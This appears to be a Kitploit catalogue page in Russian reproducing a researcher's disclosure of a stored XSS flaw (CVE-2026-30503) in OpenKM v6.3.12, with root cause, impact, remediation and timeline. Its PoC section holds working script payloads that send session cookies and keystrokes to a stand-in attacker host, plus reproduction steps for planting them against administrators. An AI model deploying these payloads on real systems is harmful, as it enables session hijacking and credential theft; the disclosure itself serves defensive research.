Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — # Раскрытие CVE-2026-30503: хранимая XSS-уязвимость в OpenKM v6.3.12 Подробное раскрытие CVE-2026-30503 — хранимой XSS-уязвимости в OpenKM v6.3.12. Включает анализ первопричины, PoC-пейлоады, оценку воздействия и рекомендации по устранению для исследователей безопасности и пентестеров. | Kitploit
Инструменты/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

# Раскрытие CVE-2026-30503: хранимая XSS-уязвимость в OpenKM v6.3.12 Подробное раскрытие CVE-2026-30503 — хранимой XSS-уязвимости в OpenKM v6.3.12. Включает анализ первопричины, PoC-пейлоады, оценку воздействия и рекомендации по устранению для исследователей безопасности и пентестеров.

Поделиться

🛡️ CVE-2026-30503 — Хранимый XSS в OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Обнаружено и сообщено: Dharmendra Kumar — исследователь безопасности

Кибербезопасность | Тестирование на проникновение | Исследование уязвимостей | Ответственное раскрытие


📌 Содержание

  • Обзор
  • Детали CVE
  • Затронутый продукт
  • Описание уязвимости
  • Анализ первопричины
  • Влияние и оценка рисков
  • Доказательство концепции (PoC)
  • Устранение и рекомендации
  • Хронология раскрытия
  • Ссылки
  • Об исследователе

  • 🔍 Обзор

    В этом репозитории документируется ответственное раскрытие CVE-2026-30503 — уязвимости хранимого межсайтового скриптинга (Stored Cross-Site Scripting, XSS), обнаруженной в OpenKM v6.3.12 — системе управления документами с открытым исходным кодом, широко используемой в корпоративных средах.

    Уязвимость позволяет аутентифицированному злоумышленнику внедрить постоянный вредоносный JavaScript в приложение, который выполняется в контексте браузера любого пользователя (включая администраторов), впоследствии просматривающего затронутый контент.

    ⚠️ Серьёзность: Высокая | Вектор атаки: Сеть | Требуемые привилегии: Низкие | Взаимодействие с пользователем: Требуется


    📋 Детали CVE

    ПолеДетали
    CVE IDCVE-2026-30503
    ПродуктOpenKM
    Затронутая версияv6.3.12
    Класс уязвимостиХранимый межсайтовый скриптинг (XSS)
    CWECWE-79: Improper Neutralization of Input During Web Page Generation
    Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
    ИсследовательDharmendra Kumar
    Тип раскрытияОтветственное / скоординированное

    📦 Затронутый продукт

    OpenKM — это бесплатная система управления документами (DMS) с открытым исходным кодом, предоставляющая веб-интерфейс для управления, аудита и распространения бизнес-документов. Она используется предприятиями, государственными органами и образовательными учреждениями по всему миру.

    • Название продукта: OpenKM Document Management System
    • Затронутая версия: v6.3.12
    • Веб-сайт вендора: https://www.openkm.com
    • Категория: Система управления документами (DMS)
    • Язык/Стек: Java (JSP/Spring)

    🧨 Описание уязвимости

    В OpenKM v6.3.12 обнаружено несколько уязвимостей хранимого межсайтового скриптинга (Stored XSS). Злоумышленник с низкопривилегированным аутентифицированным доступом может внедрять произвольные JavaScript-полезные нагрузки в одно или несколько полей ввода. Эти полезные нагрузки постоянно хранятся в бэкенде приложения и автоматически выполняются всякий раз, когда любой пользователь — включая администраторов — обращается к затронутой странице или компоненту.

    В отличие от отражённого XSS, который требует, чтобы жертва перешла по специально созданной ссылке, полезные нагрузки хранимого XSS встроены в само приложение, что делает их значительно более опасными и устойчивыми.

    Уязвимые конечные точки

    • Поля ввода, контролируемые пользователем, в метаданных документов, заметках или полях имён
    • Приложение не выполняет санитизацию и не кодирует пользовательский ввод перед его отображением в браузере

    🔬 Анализ первопричины

    Уязвимость возникает из-за трёх усугубляющих друг друга слабостей в конвейере обработки ввода приложения:

    root@kitploit:~
    User Input ──► [NO Validation] ──► Stored in DB ──► [NO Output Encoding] ──► Rendered in Browser ──► XSS Executed
    
    СлабостьОписание
    ❌ Отсутствие валидации вводаПриложение не ограничивает и не санитизирует специальные символы (<, >, ", ', ;) в полях, заполняемых пользователем
    ❌ Отсутствие кодирования выводаСохранённые значения отображаются непосредственно в HTML без кодирования HTML-сущностей
    ❌ Небезопасный рендеринг DOMДанные, предоставленные пользователем, встраиваются в контекст DOM без CSP или средств санитизации

    💥 Влияние и оценка рисков

    Успешная эксплуатация этой уязвимости может привести к:

    РискОписание
    🍪 Угон сессииКража аутентификационных токенов сессии через эксфильтрацию document.cookie
    👤 Захват учётной записиКомпрометация учётных записей жертв, включая учётные записи администраторов
    🔐 Сбор учётных данныхВнедрение фишинговых форм для перехвата учётных данных
    📤 Эксфильтрация данныхСкрытое извлечение конфиденциальных документов или метаданных из DMS
    ⚙️ Несанкционированные действияВыполнение привилегированных операций от имени жертвы (удаление/изменение документов)
    🎯 Нацеливание на администраторовПолезная нагрузка выполняется в админ-панели, когда администратор просматривает контент
    🔄 Распространение червяСамовоспроизводящаяся XSS-полезная нагрузка может распространяться между пользователями

    🧪 Доказательство концепции (PoC)

    ⚠️ Отказ от ответственности: Этот PoC предоставлен строго в образовательных целях и для исследований в области безопасности в рамках принципов ответственного раскрытия. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.

    Пример полезной нагрузки (общий)

    root@kitploit:~
    // Basic PoC — demonstrates script execution
    <script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>
    
    // Session token exfiltration
    <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>
    
    // Keylogger injection
    <script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>
    

    Шаги воспроизведения

    1. Войдите в OpenKM v6.3.12 под низкопривилегированной аутентифицированной учётной записью
    2. Перейдите к уязвимому полю ввода (например, метаданные документа / примечания / поле названия)
    3. Внедрите XSS-полезную нагрузку, например <script>alert(document.cookie)</script>
    4. Сохраните / отправьте запись
    5. Войдите как другой пользователь (или администратор) и перейдите к затронутому ресурсу
    6. Наблюдайте выполнение JavaScript-полезной нагрузки в контексте браузера жертвы

    🛠️ Устранение и рекомендации

    Для разработчиков / вендоров

    РекомендацияРеализация
    ✅ Валидация вводаСоставьте белый список допустимых символов; отклоняйте или удаляйте HTML-спецсимволы во всех пользовательских вводах
    ✅ Кодирование выводаИспользуйте контекстно-зависимое HTML-кодирование (например, OWASP Java Encoder) перед выводом данных в HTML
    ✅ Политика безопасности контента (CSP)Внедрите строгий CSP-заголовок: Content-Security-Policy: script-src 'self'
    ✅ HTTPOnly и безопасные cookieУстановите флаги HttpOnly и Secure для всех cookie сессии, чтобы предотвратить доступ из JavaScript
    ✅ Использование библиотек безопасностиИнтегрируйте OWASP AntiSamy или DOMPurify для санитизации HTML
    ✅ Проверка кода на безопасностьАудируйте все пути рендеринга на предмет несанитизированных пользовательских данных
    ✅ ОбновлениеПримените последний патч от вендора или обновитесь до исправленной версии

    Для системных администраторов

    • 🔒 Ограничьте доступ к экземпляру OpenKM только доверенными сетями
    • 📊 Отслеживайте журналы приложения на предмет подозрительной активности или неожиданных тегов скриптов в полях ввода
    • 🔄 Поддерживайте приложение в актуальном состоянии до последней исправленной версии
    • 🧩 Разверните межсетевой экран веб-приложения (WAF) с правилами обнаружения XSS в качестве компенсирующей меры контроля

    📅 Хронология раскрытия

    ДатаСобытие
    🔍 ОбнаружениеУязвимость выявлена в ходе оценки безопасности OpenKM v6.3.12
    📧 Уведомление вендораПервоначальный отчёт о раскрытии отправлен команде безопасности OpenKM
    🤝 Подтверждение вендоромКоманда OpenKM подтвердила получение отчёта
    📝 Присвоение CVECVE-2026-30503 присвоен программой CVE
    🌐 Публичное раскрытиеСкоординированное публичное раскрытие после периода устранения уязвимости

    Эта уязвимость была раскрыта в соответствии с лучшими практиками ответственного раскрытия, со скоординированными действиями с вендором и программой CVE до публичного выпуска.


    📚 Ссылки

    • 🔗 [ Github] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
    • 🔗 Запись CVE в MITRE — CVE-2026-30503
    • 🔗 NVD — Национальная база данных уязвимостей
    • 🔗 Официальный сайт OpenKM
    • 🔗 Памятка OWASP по предотвращению XSS
    • 🔗 CWE-79: Межсайтовый скриптинг
    • 🔗 OWASP Top 10 — A03:2021 Инъекции

    👨‍💻 Об исследователе

    Dharmendra Kumar

    Исследователь безопасности | Пентестер | Багхантер

    Dharmendra Kumar — независимый исследователь кибербезопасности, специализирующийся на безопасности веб-приложений, тестировании на проникновение и ответственном раскрытии уязвимостей. Сосредоточившись на выявлении реальных проблем безопасности в широко используемом программном обеспечении, он вносит вклад в повышение уровня безопасности приложений, используемых по всему миру.

    Области экспертизы:

    • 🌐 Тестирование веб-приложений на проникновение
    • 🐛 Охота за багами в рамках программ Bug Bounty
    • 🔍 Исследование уязвимостей и сообщения о CVE
    • 📋 Ответственное раскрытие и бюллетени безопасности
    • 🛡️ Уязвимости OWASP Top 10

    Контакты:

    LinkedIn GitHub Twitter


    ⚖️ Юридический отказ от ответственности

    Этот репозиторий предназначен исключительно для образовательных и информационных целей. Сведения об уязвимости и PoC-полезные нагрузки, опубликованные здесь, размещены в соответствии с принципами ответственного раскрытия. Автор не одобряет, не поощряет и не несёт ответственности за любое несанкционированное использование этой информации. Всегда получайте явное письменное разрешение перед проведением тестирования безопасности любой системы.


    🙏 Благодарности

    Отдельная благодарность:

    • Команде разработчиков OpenKM за сотрудничество в процессе ответственного раскрытия
    • Программе CVE / корпорации MITRE за присвоение и координацию идентификатора CVE
    • Широкому сообществу исследователей безопасности за постоянные усилия по повышению безопасности программного обеспечения для всех

    ⭐ Если это исследование было полезным, рассмотрите возможность поставить звёздочку этому репозиторию.

    © 2026 Dharmendra Kumar — Все права защищены

    Visitors

    Скачать инструмент